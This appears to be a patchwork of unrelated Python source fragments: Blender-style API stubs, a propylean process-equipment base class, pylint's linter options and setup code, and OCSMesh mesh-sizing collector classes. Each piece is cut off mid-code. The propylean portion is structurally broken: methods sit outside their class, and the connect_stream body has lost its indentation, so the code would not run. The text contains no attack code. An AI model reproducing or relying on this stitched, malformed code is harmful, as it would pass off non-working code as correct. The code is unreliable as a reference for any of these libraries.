'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
| |
import pandas as pd
import propylean.properties as prop
from propylean import streams
# _material_stream_equipment_map and _energy_stream_equipment_map are dictionaries
# mapping a stream index to the equipment the stream comes from and goes to,
# together with the equipment types, e.g.:
# {12: [10, CentrifugalPump, 21, PipeSegment],
#  23: [21, PipeSegment, 36, FlowMeter]}
# where the stream at index 12 has its data under key 12: it comes from the
# equipment at index 10 (a CentrifugalPump) and goes into the equipment at
# index 21 (a PipeSegment).
_material_stream_equipment_map = dict()
_energy_stream_equipment_map = dict()
#Defining generic base class for all equipments with one inlet and outlet
class _EquipmentOneInletOutlet:
    # Registry of created equipment instances; NOTE(review): this is a
    # class-level mutable list, shared by all subclasses unless each
    # subclass shadows it with its own `items` — confirm against callers.
    items = []
def __init__(self, **inputs) -> None:
    """Internal base class for equipment with one inlet and one outlet.

    All final equipment classes inherit from this base class; see the
    final classes for full descriptions.

    Keyword Args:
        tag (str): Optional equipment tag. Defaults to None.
            TODO: make the tag required or randomly generate one.
        dynamic_state (bool): True if the equipment is in dynamic state
            and its inventory is changing. Defaults to False.
            TODO: provide dynamic simulation capabilities.
        inlet_mass_flowrate, outlet_mass_flowrate, design_flowrate
            (int or float): material flowrates of the equipment.
        inlet_pressure, outlet_pressure, design_pressure (int or float):
            material pressures of the equipment.
        pressure_drop (int or float): pressure drop across the equipment.
        inlet_temperature, outlet_temperature, design_temperature
            (int or float): material temperatures of the equipment.

    Sample use case:
        >>> class NewEquipment(_EquipmentOneInletOutlet):
        ......
    """
    self.tag = inputs.get('tag', None)
    self.dynamic_state = inputs.get('dynamic_state', False)

    def _make(prop_cls, key):
        # Build the property object, seeding it with the user value when given.
        return prop_cls(inputs[key]) if key in inputs else prop_cls()

    # Flow properties
    self._inlet_mass_flowrate = _make(prop.MassFlowRate, 'inlet_mass_flowrate')
    self._outlet_mass_flowrate = _make(prop.MassFlowRate, 'outlet_mass_flowrate')
    # TODO: Design pressure calcs
    self.design_flowrate = _make(prop.MassFlowRate, 'design_flowrate')
    # Pressure properties
    self._inlet_pressure = _make(prop.Pressure, 'inlet_pressure')
    self._outlet_pressure = _make(prop.Pressure, 'outlet_pressure')
    if 'pressure_drop' in inputs:
        self.pressure_drop = prop.Pressure(inputs['pressure_drop'])
    self.design_pressure = _make(prop.Pressure, 'design_pressure')
    # Temperature properties
    self._inlet_temperature = _make(prop.Temperature, 'inlet_temperature')
    self._outlet_temperature = _make(prop.Temperature, 'outlet_temperature')
    self.design_temperature = _make(prop.Temperature, 'design_temperature')
    # Inlet and outlet material and energy streams
    self._inlet_material_stream_tag = None
    self._outlet_material_stream_tag = None
    self._inlet_energy_stream_tag = None
    self._outlet_energy_stream_tag = None
    # Other properties
    self._is_disconnection = False
@property
def inlet_pressure(self):
    """Material inlet pressure of the equipment (prop.Pressure)."""
    return self._inlet_pressure

@inlet_pressure.setter
def inlet_pressure(self, value):
    """Set inlet pressure from a bare value or a (value, unit) tuple and
    propagate the change to the outlet side using the current pressure drop."""
    if isinstance(value, tuple):
        self._inlet_pressure.unit = value[1]
        value = value[0]
    self._inlet_pressure.value = value
    # BUG FIX: the pressure_drop property returns a prop.Pressure object,
    # not a number — use its numeric value in the arithmetic.
    self._outlet_pressure.value = self._inlet_pressure.value - self.pressure_drop.value
@property
def outlet_pressure(self):
    """Material outlet pressure of the equipment (prop.Pressure)."""
    return self._outlet_pressure

@outlet_pressure.setter
def outlet_pressure(self, value):
    """Set outlet pressure from a bare value or a (value, unit) tuple and
    back-propagate the change to the inlet side using the pressure drop."""
    if isinstance(value, tuple):
        self._outlet_pressure.unit = value[1]
        value = value[0]
    self._outlet_pressure.value = value
    # BUG FIX: the pressure_drop property returns a prop.Pressure object,
    # not a number — use its numeric value in the arithmetic.
    self._inlet_pressure.value = self._outlet_pressure.value + self.pressure_drop.value
@property
def pressure_drop(self):
    """Pressure drop across the equipment as a prop.Pressure.

    Reports a zero drop when either terminal pressure is unknown or the
    inlet flowrate is zero (no flow, no drop).  The returned Pressure
    carries the inlet pressure's unit.
    """
    if (self._inlet_pressure.value is None or
            self._outlet_pressure.value is None or
            self._inlet_mass_flowrate.value == 0):
        value = 0
    else:
        value = self._inlet_pressure.value - self._outlet_pressure.value
    return prop.Pressure(value=value, unit=self._inlet_pressure.unit)

@pressure_drop.setter
def pressure_drop(self, value):
    """Set the drop and update whichever terminal pressure is unknown.

    Accepts a bare value or a (value, unit) tuple.  Raises if neither the
    inlet nor the outlet pressure has been assigned yet.
    """
    if isinstance(value, tuple):
        # NOTE(review): the unit from the tuple is applied to the outlet
        # pressure, mirroring the original behavior — confirm intent.
        self._outlet_pressure.unit = value[1]
        value = value[0]
    if self._inlet_pressure.value is not None:
        self._outlet_pressure.value = self._inlet_pressure.value - value
    elif self._outlet_pressure.value is not None:
        self._inlet_pressure.value = self._outlet_pressure.value + value
    else:
        # Typo fixed in message ("outlet outlet" -> "outlet value").
        raise Exception("Error! Assign inlet value or outlet value before assigning differential")
@property
def inlet_temperature(self):
    """Material inlet temperature of the equipment (prop.Temperature)."""
    return self._inlet_temperature

@inlet_temperature.setter
def inlet_temperature(self, value):
    """Set inlet temperature from a bare value or a (value, unit) tuple."""
    if isinstance(value, tuple):
        value, self._inlet_temperature.unit = value[0], value[1]
    self._inlet_temperature.value = value
@property
def outlet_temperature(self):
    """Material outlet temperature of the equipment (prop.Temperature)."""
    return self._outlet_temperature

@outlet_temperature.setter
def outlet_temperature(self, value):
    """Set outlet temperature from a bare value or a (value, unit) tuple."""
    if isinstance(value, tuple):
        value, self._outlet_temperature.unit = value[0], value[1]
    self._outlet_temperature.value = value
@property
def inlet_mass_flowrate(self):
    """Numeric inlet mass flowrate (the value of the prop.MassFlowRate)."""
    return self._inlet_mass_flowrate.value

@inlet_mass_flowrate.setter
def inlet_mass_flowrate(self, value):
    """Set inlet flowrate and recompute the outlet flowrate."""
    self._inlet_mass_flowrate.value = value
    # BUG FIX: inventory_change_rate = inlet - outlet, therefore
    # outlet = inlet - change.  The original added the change rate,
    # contradicting the inventory_change_rate setter below.
    self._outlet_mass_flowrate = self._inlet_mass_flowrate.value - self.inventory_change_rate
@property
def outlet_mass_flowrate(self):
    """Outlet mass flowrate of the equipment."""
    return self._outlet_mass_flowrate

@outlet_mass_flowrate.setter
def outlet_mass_flowrate(self, value):
    """Set outlet flowrate and recompute the inlet flowrate."""
    self._outlet_mass_flowrate = value
    # BUG FIX: inventory_change_rate = inlet - outlet, therefore
    # inlet = outlet + change.  The original subtracted the change rate,
    # contradicting the inventory_change_rate setter below.
    self._inlet_mass_flowrate.value = self._outlet_mass_flowrate + self.inventory_change_rate
@property
def inventory_change_rate(self):
    """Rate of mass accumulation: inlet minus outlet flowrate.

    Returns 0 in steady state, and None when the equipment is dynamic but
    either flowrate is still unknown.
    """
    if not self.dynamic_state:
        return 0
    if (self._inlet_mass_flowrate.value is None or
            self._outlet_mass_flowrate is None):
        return None
    return self._inlet_mass_flowrate.value - self._outlet_mass_flowrate

@inventory_change_rate.setter
def inventory_change_rate(self, value):
    """Set the accumulation rate by adjusting whichever flowrate is unknown."""
    if self._inlet_mass_flowrate.value is not None:
        self._outlet_mass_flowrate = self._inlet_mass_flowrate.value - value
    elif self._outlet_mass_flowrate is not None:
        self._inlet_mass_flowrate.value = self._outlet_mass_flowrate + value
    else:
        # Typo fixed in message ("outlet outlet" -> "outlet value").
        raise Exception("Error! Assign inlet value or outlet value before assigning differential")
@classmethod
def get_equipment_index(cls, tag):
    """Return the index in cls.items of the equipment whose tag matches,
    or None when no equipment carries that tag."""
    matches = (index for index, equipment in enumerate(cls.items)
               if equipment.tag == tag)
    return next(matches, None)
def get_stream_tag(self, stream_type, direction):
    """Return the tag of the stream connected to this equipment.

    Args:
        stream_type (str): 'm'/'mass'/'material' or 'e'/'p'/'energy'/'power'.
        direction (str): 'in', 'inlet', 'out' or 'outlet', relative to
            the equipment.

    Returns:
        str: the tag the user assigned to that stream (may be None).

    Raises:
        Exception: when stream_type or direction is not one of the
            accepted values.

    Sample use cases:
        >>> eq1.get_stream_tag('m', 'out')
        >>> eq1.get_stream_tag('energy', 'in')
    """
    kind = stream_type.lower()
    if kind in ('material', 'mass', 'm'):
        tags = (self._inlet_material_stream_tag, self._outlet_material_stream_tag)
    elif kind in ('energy', 'power', 'e', 'p'):
        tags = (self._inlet_energy_stream_tag, self._outlet_energy_stream_tag)
    else:
        raise Exception('Incorrect stream_type specified! Provided \"'+stream_type+'\". Can only be "material/mass/m" or "energy/e/power/p"]')
    side = direction.lower()
    if side in ('in', 'inlet'):
        return tags[0]
    if side in ('out', 'outlet'):
        return tags[1]
    raise Exception('Incorrect direction specified! Provided \"'+direction+'\". Can only be ["in", "out", "inlet", "outlet"]')
def connect_stream(self,
stream_object=None,
direction=None,
stream_tag=None,
stream_type=None):
"""
DESCRIPTION:
Class method to connect a stream object with equiment.
PARAMETERS:
stream_object:
Required: No if stream_tag is provided else Yes
Type: EnergyStream or MaterialStream
Acceptable values: object of specified stream types
Default value: None
Description: Stream object user wants to connect the equipment with.
direction:
Required: Yes for material stream. For energy stream not needed
Type: str
Acceptable values: 'in', 'out', 'inlet' or 'outlet'
Default value: None
Description: Direction in which stream should be with respect to equipment.
stream_tag:
Required: No if stream_object is provided else Yes
Type: str
Acceptable values: stream tag provided by user
Default value: None
Description: Stream object with known stream_tag user wants to connect the equipment with.
stream_type:
Required: No if stream_object provided
Type: str
Acceptable values: 'm', 'mass', 'e', 'energy'
Description: Type of stream user wants to connect.
RETURN VALUE:
Type: bool
Description: True is returned if connection is successful else False
ERROR RAISED:
Type: General
Description: Error raised if arguments are wrong
SAMPLE USE CASES:
>>> eq1.connect_stream(en1)
>>> eq1.connect_stream(direction='out', stream_tag='Pump-outlet', stream_type='m')
"""
if stream_object is not None:
if not (isinstance(stream_object, streams.EnergyStream) or
isinstance(stream_object, streams.MaterialStream)):
raise Exception("Stream object should be of type EnergyStream or Material Stream not "+
+type(stream_object))
stream_tag = stream_object.tag
if isinstance(stream_object, streams.MaterialStream):
stream_type = 'material'
elif isinstance(stream_object, streams.EnergyStream):
stream_type = 'energy'
elif not self._is_disconnection and stream_tag is None:
raise Exception("Either of Stream Object or Stream Tag is required for connection!")
if stream_type.lower() not in ['material', 'mass', 'm', 'energy', 'power', | |
Pylint. Specifying 0 will "
"auto-detect the number of processors available to use.",
},
),
(
"unsafe-load-any-extension",
{
"type": "yn",
"metavar": "<yn>",
"default": False,
"hide": True,
"help": (
"Allow loading of arbitrary C extensions. Extensions"
" are imported into the active Python interpreter and"
" may run arbitrary code."
),
},
),
(
"limit-inference-results",
{
"type": "int",
"metavar": "<number-of-results>",
"default": 100,
"help": (
"Control the amount of potential inferred values when inferring "
"a single object. This can help the performance when dealing with "
"large functions or complex, nested conditions. "
),
},
),
(
"extension-pkg-allow-list",
{
"type": "csv",
"metavar": "<pkg[,pkg]>",
"default": [],
"help": (
"A comma-separated list of package or module names"
" from where C extensions may be loaded. Extensions are"
" loading into the active Python interpreter and may run"
" arbitrary code."
),
},
),
(
"extension-pkg-whitelist",
{
"type": "csv",
"metavar": "<pkg[,pkg]>",
"default": [],
"help": (
"A comma-separated list of package or module names"
" from where C extensions may be loaded. Extensions are"
" loading into the active Python interpreter and may run"
" arbitrary code. (This is an alternative name to"
" extension-pkg-allow-list for backward compatibility.)"
),
},
),
(
"suggestion-mode",
{
"type": "yn",
"metavar": "<yn>",
"default": True,
"help": (
"When enabled, pylint would attempt to guess common "
"misconfiguration and emit user-friendly hints instead "
"of false-positive error messages."
),
},
),
(
"exit-zero",
{
"action": "store_true",
"help": (
"Always return a 0 (non-error) status code, even if "
"lint errors are found. This is primarily useful in "
"continuous integration scripts."
),
},
),
(
"from-stdin",
{
"action": "store_true",
"help": (
"Interpret the stdin as a python script, whose filename "
"needs to be passed as the module_or_package argument."
),
},
),
)
# (title, description) pairs for the option groups shown in --help output.
option_groups = (
    ("Messages control", "Options controlling analysis messages"),
    ("Reports", "Options related to output formatting and reporting"),
)
def __init__(self, options=(), reporter=None, option_groups=(), pylintrc=None):
    """Some stuff has to be done before ancestors initialization...
    messages store / checkers / reporter / astroid manager"""
    # Registries must exist before option handling: registering the linter
    # as a checker (below) touches all of them.
    self.msgs_store = MessageDefinitionStore()
    self.reporter = None
    self._reporter_names = None
    self._reporters = {}
    self._checkers = collections.defaultdict(list)
    self._pragma_lineno = {}
    self._ignore_file = False
    # visit variables
    self.file_state = FileState()
    self.current_name = None
    self.current_file = None
    self.stats = None
    self.fail_on_symbols = []
    # init options
    self._external_opts = options
    self.options = options + PyLinter.make_options()
    self.option_groups = option_groups + PyLinter.option_groups
    # enable/disable are handled specially in set_option; the *-msg
    # variants are deprecated aliases kept for backward compatibility.
    self._options_methods = {"enable": self.enable, "disable": self.disable}
    self._bw_options_methods = {
        "disable-msg": self._options_methods["disable"],
        "enable-msg": self._options_methods["enable"],
    }
    MessagesHandlerMixIn.__init__(self)
    reporters.ReportsHandlerMixIn.__init__(self)
    super().__init__(
        usage=__doc__,
        config_file=pylintrc or next(config.find_default_config_files(), None),
    )
    checkers.BaseTokenChecker.__init__(self)
    # provided reports
    self.reports = (
        ("RP0001", "Messages by category", report_total_messages_stats),
        (
            "RP0002",
            "% errors / warnings by module",
            report_messages_by_module_stats,
        ),
        ("RP0003", "Messages", report_messages_stats),
    )
    # The linter is itself a checker so it can emit its own messages.
    self.register_checker(self)
    self._dynamic_plugins = set()
    self._python3_porting_mode = False
    self._error_mode = False
    self.load_provider_defaults()
    if reporter:
        self.set_reporter(reporter)
def load_default_plugins(self):
    """Register the built-in checkers and reporters."""
    checkers.initialize(self)
    reporters.initialize(self)
    # Make sure to load the default reporter, because
    # the option has been set before the plugins had been loaded.
    if not self.reporter:
        self._load_reporters()
def load_plugin_modules(self, modnames):
    """Load and register the named pylint plugin modules.

    Already-seen names are skipped, so the method is idempotent.
    Unresolvable modules are silently ignored here; configuration-time
    reporting happens later in load_plugin_configuration.
    """
    for name in modnames:
        if name in self._dynamic_plugins:
            continue
        self._dynamic_plugins.add(name)
        try:
            astroid.modutils.load_module_from_name(name).register(self)
        except ModuleNotFoundError:
            pass
def load_plugin_configuration(self):
    """Call the optional ``load_configuration`` hook of every loaded plugin.

    Each registered plugin module is imported again; when the module
    exposes a ``load_configuration`` attribute it is invoked with the
    linter so the plugin can tune specific settings.  Plugins that can
    no longer be imported produce a bad-plugin-value message.
    """
    for plugin_name in self._dynamic_plugins:
        try:
            plugin = astroid.modutils.load_module_from_name(plugin_name)
            hook = getattr(plugin, "load_configuration", None)
            if hook is not None:
                hook(self)
        except ModuleNotFoundError as e:
            self.add_message("bad-plugin-value", args=(plugin_name, e), line=0)
def _load_reporters(self) -> None:
    """Instantiate the reporters named in --output-format.

    The option is a comma-separated list of entries of the form
    ``name`` or ``name:output_file``.  A single reporter is installed
    directly; several are wrapped in a MultiReporter.
    """
    sub_reporters = []
    output_files = []
    with contextlib.ExitStack() as stack:
        for reporter_name in self._reporter_names.split(","):
            reporter_name, *reporter_output = reporter_name.split(":", 1)
            reporter = self._load_reporter_by_name(reporter_name)
            sub_reporters.append(reporter)
            if reporter_output:
                (reporter_output,) = reporter_output
                # pylint: disable=consider-using-with
                output_file = stack.enter_context(open(reporter_output, "w"))
                reporter.set_output(output_file)
                output_files.append(output_file)
        # Extend the lifetime of all opened output files
        # beyond the ExitStack: pop_all() transfers ownership of the open
        # files; the returned close callback is handed to MultiReporter.
        close_output_files = stack.pop_all().close
    if len(sub_reporters) > 1 or output_files:
        self.set_reporter(
            reporters.MultiReporter(
                sub_reporters,
                close_output_files,
            )
        )
    else:
        self.set_reporter(sub_reporters[0])
def _load_reporter_by_name(self, reporter_name: str) -> reporters.BaseReporter:
name = reporter_name.lower()
if name in self._reporters:
return self._reporters[name]()
try:
reporter_class = _load_reporter_by_class(reporter_name)
except (ImportError, AttributeError) as e:
raise exceptions.InvalidReporterError(name) from e
else:
return reporter_class()
def set_reporter(self, reporter):
    """Install *reporter* for message display and give it a back-reference
    to this linter."""
    self.reporter = reporter
    reporter.linter = self
def set_option(self, optname, value, action=None, optdict=None):
    """overridden from config.OptionsProviderMixin to handle some
    special options
    """
    # enable/disable (and their deprecated *-msg aliases) are routed to
    # the message-control methods instead of generic option storage.
    if optname in self._options_methods or optname in self._bw_options_methods:
        if value:
            try:
                meth = self._options_methods[optname]
            except KeyError:
                # Deprecated alias: warn, then fall back to the real method.
                meth = self._bw_options_methods[optname]
                warnings.warn(
                    "%s is deprecated, replace it by %s"
                    % (optname, optname.split("-")[0]),
                    DeprecationWarning,
                )
            # The value may be a comma-separated list of message ids/symbols.
            value = utils._check_csv(value)
            if isinstance(value, (list, tuple)):
                for _id in value:
                    meth(_id, ignore_unknown=True)
            else:
                meth(value)
        return  # no need to call set_option, disable/enable methods do it
    elif optname == "output-format":
        self._reporter_names = value
        # If the reporters are already available, load
        # the reporter class.
        if self._reporters:
            self._load_reporters()
    try:
        checkers.BaseTokenChecker.set_option(self, optname, value, action, optdict)
    except config.UnsupportedAction:
        print("option %s can't be read from config file" % optname, file=sys.stderr)
def register_reporter(self, reporter_class):
    """Make *reporter_class* selectable via its ``name`` attribute."""
    self._reporters[reporter_class.name] = reporter_class
def report_order(self):
    """Return all report providers sorted by name, with this linter's own
    reports moved to the end of the list."""
    providers = sorted(self._reports, key=lambda provider: getattr(provider, "name", ""))
    if self in providers:
        # Run our own reports last.
        providers.remove(self)
        providers.append(self)
    return providers
# checkers manipulation methods ############################################
def register_checker(self, checker):
    """register a new checker

    checker is an object implementing IRawChecker or / and IAstroidChecker
    """
    assert checker.priority <= 0, "checker priority can't be >= 0"
    self._checkers[checker.name].append(checker)
    # Hook up the checker's reports, options and message definitions.
    for r_id, r_title, r_cb in checker.reports:
        self.register_report(r_id, r_title, r_cb, checker)
    self.register_options_provider(checker)
    if hasattr(checker, "msgs"):
        self.msgs_store.register_messages_from_checker(checker)
    checker.load_defaults()
    # Register the checker, but disable all of its messages.
    if not getattr(checker, "enabled", True):
        self.disable(checker.name)
def enable_fail_on_messages(self):
    """enable 'fail on' msgs

    Convert values in config.fail_on (which might be msg category, msg id,
    or symbol) to specific msgs, then enable and flag them for later.
    """
    fail_on_vals = self.config.fail_on
    if not fail_on_vals:
        return
    fail_on_cats = set()
    fail_on_msgs = set()
    for val in fail_on_vals:
        # If value is a category, add category, else add message
        if val in MSG_TYPES:
            fail_on_cats.add(val)
        else:
            fail_on_msgs.add(val)
    # For every message in every checker, if cat or msg flagged, enable check
    for all_checkers in self._checkers.values():
        for checker in all_checkers:
            for msg in checker.messages:
                if msg.msgid in fail_on_msgs or msg.symbol in fail_on_msgs:
                    # message id/symbol matched, enable and flag it
                    self.enable(msg.msgid)
                    self.fail_on_symbols.append(msg.symbol)
                elif msg.msgid[0] in fail_on_cats:
                    # message starts with a category value, flag (but do not enable) it
                    self.fail_on_symbols.append(msg.symbol)
def any_fail_on_issues(self):
    """Return True when any emitted message was flagged by --fail-on."""
    emitted = self.stats["by_msg"]
    return any(symbol in emitted for symbol in self.fail_on_symbols)
def disable_noerror_messages(self):
    """Keep only error ('E') and fatal ('F') messages enabled; disable the rest."""
    for category, msgids in self.msgs_store._msgs_by_category.items():
        toggle = self.enable if category in ("E", "F") else self.disable
        for msgid in msgids:
            toggle(msgid)
def disable_reporters(self):
    """Turn off every registered report."""
    for report_list in self._reports.values():
        for report_id, _title, _callback in report_list:
            self.disable_report(report_id)
def error_mode(self):
    """error mode: enable only errors; no reports, no persistent"""
    self._error_mode = True
    self.disable_noerror_messages()
    self.disable("miscellaneous")
    if self._python3_porting_mode:
        # Porting mode is active too: re-run its selection so only the
        # python3 checker's errors stay enabled.
        self.disable("all")
        for msg_id in self._checker_messages("python3"):
            if msg_id.startswith("E"):
                self.enable(msg_id)
        config_parser = self.cfgfile_parser
        # Re-apply explicit disables from the config file on top.
        if config_parser.has_option("MESSAGES CONTROL", "disable"):
            value = config_parser.get("MESSAGES CONTROL", "disable")
            self.global_set_option("disable", value)
    else:
        self.disable("python3")
    self.set_option("reports", False)
    self.set_option("persistent", False)
    self.set_option("score", False)
def python3_porting_mode(self):
    """Disable all other checkers and enable Python 3 warnings."""
    self.disable("all")
    # re-enable some errors, or 'print', 'raise', 'async', 'await' will mistakenly lint fine
    self.enable("fatal")  # F0001
    self.enable("astroid-error")  # F0002
    self.enable("parse-error")  # F0010
    self.enable("syntax-error")  # E0001
    self.enable("python3")
    if self._error_mode:
        # The error mode was activated, using the -E flag.
        # So we'll need to enable only the errors from the
        # Python 3 porting checker.
        for msg_id in self._checker_messages("python3"):
            if msg_id.startswith("E"):
                self.enable(msg_id)
            else:
                self.disable(msg_id)
    config_parser = self.cfgfile_parser
    # Re-apply explicit disables from the config file on top.
    if config_parser.has_option("MESSAGES CONTROL", "disable"):
        value = config_parser.get("MESSAGES CONTROL", "disable")
        self.global_set_option("disable", value)
    self._python3_porting_mode = True
def list_messages_enabled(self):
    """Print every known message, grouped into enabled and disabled sets."""
    enabled, disabled = [], []
    for message in self.msgs_store.messages:
        label = f"  {message.symbol} ({message.msgid})"
        bucket = enabled if self.is_message_enabled(message.msgid) else disabled
        bucket.append(label)
    print("Enabled messages:")
    for line in sorted(enabled):
        print(line)
    print("\nDisabled messages:")
    for line in sorted(disabled):
        print(line)
    print("")
# block level option | |
# Repository: yosoyjay/OCSMesh
import os
import gc
import logging
import warnings
import tempfile
from pathlib import Path
from time import time
from multiprocessing import Pool, cpu_count
from copy import copy, deepcopy
from typing import Union, Sequence, List, Tuple
import numpy as np
import geopandas as gpd
from pyproj import CRS, Transformer
from shapely.geometry import MultiPolygon, Polygon, GeometryCollection, box
from shapely import ops
from jigsawpy import jigsaw_msh_t
from rasterio.transform import from_origin
from rasterio.warp import reproject, Resampling
import rasterio
from ocsmesh import utils
from ocsmesh.hfun.base import BaseHfun
from ocsmesh.hfun.raster import HfunRaster
from ocsmesh.hfun.mesh import HfunMesh
from ocsmesh.mesh.mesh import Mesh, EuclideanMesh2D
from ocsmesh.raster import Raster, get_iter_windows
from ocsmesh.features.contour import Contour
from ocsmesh.features.patch import Patch
from ocsmesh.features.channel import Channel
from ocsmesh.features.constraint import (
TopoConstConstraint, TopoFuncConstraint)
_logger = logging.getLogger(__name__)
class RefinementContourInfoCollector:
    """Maps refinement-contour definitions to the sizing kwargs given for each."""

    def __init__(self):
        self._contours_info = {}

    def add(self, contour_defn, **size_info):
        """Record *size_info* for *contour_defn*; a later add overwrites."""
        self._contours_info[contour_defn] = size_info

    def __iter__(self):
        """Yield (contour_defn, size_info) pairs in insertion order."""
        yield from self._contours_info.items()
class RefinementContourCollector:
    """Computes refinement contours from raster sources and caches them on disk.

    ``calculate`` extracts the contours and writes each one as a feather
    file plus a CRS json sidecar; iterating the collector reads them back
    as GeoDataFrames.
    """

    def __init__(self, contours_info):
        # Iterable of (contour_defn, size_info) pairs (see
        # RefinementContourInfoCollector).
        self._contours_info = contours_info
        self._container: List[Union[Tuple, None]] = []

    def calculate(self, source_list, out_path):
        """Extract all contours, caching each as feather + CRS json under out_path."""
        out_dir = Path(out_path)
        out_dir.mkdir(exist_ok=True, parents=True)
        file_counter = 0
        pid = os.getpid()
        self._container.clear()
        for contour_defn, size_info in self._contours_info:
            if not contour_defn.has_source:
                # Copy so that in case of a 2nd run the no-source
                # contour still gets all current sources
                contour_defn = copy(contour_defn)
                for source in source_list:
                    contour_defn.add_source(source)
            for contour, crs in contour_defn.iter_contours():
                file_counter = file_counter + 1
                feather_path = out_dir / f"contour_{pid}_{file_counter}.feather"
                crs_path = out_dir / f"crs_{pid}_{file_counter}.json"
                gpd.GeoDataFrame(
                    { 'geometry': [contour],
                      'expansion_rate': size_info['expansion_rate'],
                      'target_size': size_info['target_size'],
                    },
                    crs=crs).to_feather(feather_path)
                gc.collect()
                with open(crs_path, 'w') as fp:
                    fp.write(crs.to_json())
                self._container.append((feather_path, crs_path))

    def __iter__(self):
        """Yield the cached contours as GeoDataFrames with their CRS applied."""
        for feather_path, crs_path in self._container:
            gdf = gpd.read_feather(feather_path)
            with open(crs_path) as fp:
                # BUG FIX: set_crs returns a new frame unless inplace=True;
                # the original discarded the result, leaving the CRS unset.
                # allow_override covers the case where the feather file
                # already carries a CRS.
                gdf = gdf.set_crs(CRS.from_json(fp.read()), allow_override=True)
            yield gdf
class ConstantValueContourInfoCollector:
    """Registry of constant values keyed by (sources, contour-pair)."""

    def __init__(self):
        self._contours_info = {}

    def add(self, src_idx, contour_defn0, contour_defn1, value):
        """Register a constant value between two contour definitions."""
        # Normalize source indices to a hashable tuple; None means "all".
        key_srcs = None if src_idx is None else tuple(src_idx)
        self._contours_info[(key_srcs, contour_defn0, contour_defn1)] = value

    def __iter__(self):
        """Yield ``((srcs, defn0, defn1), value)`` pairs in insertion order."""
        yield from self._contours_info.items()
class RefinementPatchInfoCollector:
    """Registry mapping patch definitions to their sizing parameters."""

    def __init__(self):
        self._patch_info = {}

    def add(self, patch_defn, **size_info):
        """Register (or overwrite) the sizing info for a patch definition."""
        self._patch_info[patch_defn] = size_info

    def __iter__(self):
        """Yield ``(patch_defn, size_info)`` pairs in insertion order."""
        yield from self._patch_info.items()
class FlowLimiterInfoCollector:
    """Registry of subtidal-flow-limiter specifications."""

    def __init__(self):
        self._flow_lim_info = []

    def add(self, src_idx, hmin, hmax, upper_bound, lower_bound):
        """Register one flow-limiter spec; ``src_idx`` None means "all"."""
        srcs = tuple(src_idx) if src_idx is not None else None
        # BUG FIX: store the normalized `srcs` tuple. The original appended
        # the raw `src_idx`, leaving the computed normalization unused and
        # diverging from the sibling collectors in this module.
        self._flow_lim_info.append(
            (srcs, hmin, hmax, upper_bound, lower_bound))

    def __iter__(self):
        """Yield ``(src_idx, hmin, hmax, upper_bound, lower_bound)`` tuples."""
        for src_idx, hmin, hmax, ub, lb in self._flow_lim_info:
            yield src_idx, hmin, hmax, ub, lb
class ChannelRefineInfoCollector:
    """Registry mapping channel definitions to their sizing parameters."""

    def __init__(self):
        self._ch_info_dict = {}

    def add(self, channel_defn, **size_info):
        """Register (or overwrite) the sizing info for a channel definition."""
        self._ch_info_dict[channel_defn] = size_info

    def __iter__(self):
        """Yield ``(channel_defn, size_info)`` pairs in insertion order."""
        yield from self._ch_info_dict.items()
class ChannelRefineCollector:
    """Materializes registered channel refinements.

    ``calculate`` extracts channel geometries from the given sources and
    persists each as a feather file plus a sidecar CRS JSON; ``__iter__``
    lazily re-reads them as GeoDataFrames.
    """

    def __init__(self, channels_info):
        # Iterable of (channel_defn, size_info) pairs (see
        # ChannelRefineInfoCollector).
        self._channels_info = channels_info
        self._container: List[Union[Tuple, None]] = []

    def calculate(self, source_list, out_path):
        """Extract channels and write them under ``out_path``.

        Results from a previous run are discarded.
        """
        out_dir = Path(out_path)
        out_dir.mkdir(exist_ok=True, parents=True)
        file_counter = 0
        pid = os.getpid()
        self._container.clear()
        for channel_defn, size_info in self._channels_info:
            if not channel_defn.has_source:
                # Copy so that in case of a 2nd run the no-source
                # channel still gets all current sources.
                # (assumes `copy` is `copy.copy` imported at module top --
                # TODO confirm)
                channel_defn = copy(channel_defn)
                for source in source_list:
                    channel_defn.add_source(source)
            for channels, crs in channel_defn.iter_channels():
                file_counter = file_counter + 1
                feather_path = out_dir / f"channels_{pid}_{file_counter}.feather"
                crs_path = out_dir / f"crs_{pid}_{file_counter}.json"
                gpd.GeoDataFrame(
                    { 'geometry': [channels],
                      'expansion_rate': size_info['expansion_rate'],
                      'target_size': size_info['target_size'],
                    },
                    crs=crs).to_feather(feather_path)
                gc.collect()
                with open(crs_path, 'w') as fp:
                    fp.write(crs.to_json())
                self._container.append((feather_path, crs_path))

    def __iter__(self):
        """Yield one GeoDataFrame per stored channel set, with CRS applied."""
        for raster_data in self._container:
            feather_path, crs_path = raster_data
            gdf = gpd.read_feather(feather_path)
            with open(crs_path) as fp:
                # BUG FIX: GeoDataFrame.set_crs is not in-place by default;
                # the original discarded its return value, so the CRS was
                # never applied. allow_override handles a CRS already
                # restored by read_feather.
                gdf = gdf.set_crs(
                    CRS.from_json(fp.read()), allow_override=True)
            yield gdf
class ConstraintInfoCollector:
    """Registry of constraints paired with their target source indices."""

    def __init__(self):
        self._constraints_info = []

    def add(self, src_idx, constraint):
        """Register a constraint; ``src_idx`` None means "all sources"."""
        normalized = tuple(src_idx) if src_idx is not None else None
        self._constraints_info.append((normalized, constraint))

    def __iter__(self):
        """Yield ``(srcs, constraint)`` tuples in registration order."""
        yield from self._constraints_info
class HfunCollector(BaseHfun):
def __init__(
        self,
        in_list: Sequence[
            Union[str, Raster, Mesh, HfunRaster, HfunMesh]],
        base_mesh: Mesh = None,
        hmin: float = None,
        hmax: float = None,
        nprocs: int = None,
        verbosity: int = 0,
        method: str = 'exact',
        base_as_hfun: bool = True,
        base_shape: Union[Polygon, MultiPolygon] = None,
        base_shape_crs: Union[str, CRS] = 'EPSG:4326'
        ):
    """Collect size-function inputs (rasters, meshes, hfuns or file paths).

    Inputs are clipped to ``base_shape`` (or the base mesh bbox) where
    applicable and wrapped in the appropriate Hfun type.

    NOTE: Input Hfuns and their Rasters can get modified.
    """
